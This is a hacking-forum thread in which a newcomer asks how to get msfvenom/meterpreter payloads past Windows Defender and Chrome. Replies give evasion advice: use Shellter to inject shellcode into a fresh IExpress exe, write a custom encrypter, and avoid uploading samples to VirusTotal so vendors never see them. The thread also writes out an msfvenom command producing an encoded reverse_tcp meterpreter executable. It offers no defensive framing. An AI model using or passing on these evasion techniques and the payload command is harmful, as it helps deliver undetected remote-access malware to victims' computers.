Forum Thread: How Can I Make My Payload Undetectable?

I am new to this kali linux stuff, so far i have worked with aircrack-ng, msfvenom and meterpreter. So please help me even if my question may sound silly. Every time i want to test my payload i have to deactivate chrome and windows defender and i want to get better in any ideas? Everthing i have tried so far from forums didn't work or i didn't understand some stuff...if you have a solution using gcc compiler i am open because i have 5 years in c/c++/c# programming Thanks in advance :)

21 Responses

There is almost no way unless you code it yourself now, AV detection is strong, now Veil-Evasion, Shelter, The fat rat (These are the payload encrypter)doesn't work.

Can you tell me how to do this or where to learn?

I have tried some example to copy some rows from msfvenom /x64/..... And some random character string in the code, i have compiled it but the dimension of the file was only 7kb compared to 70 from normal msfvenom, yes the windows defender hasnt found it but when i tried to run it, it gave me a warrning screen with publisher and something

Then you can also encrypt the normal payload by using your own encryption method or there are plenty of encrypters on github.

How do i encrypt it?
All of them use tools like you said before fatrat, vile

Because AV is used to base64 encryption that is from Veil and other payload hider, but if it is a encryption that was never used before in payloads it will work.

For example, there is Malbolge language, which is hard to decrypt

How can i make my own encrypting program?

If those programs don't work, you are using the wrong exe. I know for a fact that Shellter still works perfectly.

You can use Shellter. It's very simple to use and will make it mostly undetectable.

Go to my profile and read my tutorial. You can skip Part 1 entirety.
Shellter works best using a new exe file that was not already detectable.

Thanks a lot i will check it out tomorow and tell you how it worked

Hey thanks a lot, your shellter tutorial worked but i have some questions

  1. Google Chrome detects it so any ideea how to bypass it?
  2. How can i make my own shellter program, not to complicated
  3. So i made an exe on kali with g++ compiler like hello world :)) but if i upload it to windows and try to run it with execute i get an error that says that is not a valid win 32 application, and if i try to run it manually in windows it says: something with publisher not known, but if i try ti run my Visual Studio Application made with execute in works... thanks :)

virtual hug

i tried again today with shellter and windows defender detects it :((

Told ya. Those are old now.

Then why does it work perfectly for me?

Well, it detects mine though. Probably in 2018 it will be detected.

Have you tried on windows defender?

Yes. What I do is what's in my tutorial. Create an exe with Iexpress in Windows. Use the newest version of Shellter and inject the shell code. I have tested it on my windows 10 machine which has windows Defender and Malwarebytes Antimalware and neither detects it. Make sure you DO NOT upload to virus total, it will get detected by some AV, especially if you have your listener running, and they share the exe with every AV.

So i dont shell the payload created with msfvenom?

What payload are you creating with msfvenom?

msfvenom -p windows/meterpreter/reverse_tcp lhost and lport -e cmd/powershell_base64(not sure if this helps with anything) -i 4 -f exe > something.exe


Share Your Thoughts

  • Hot
  • Active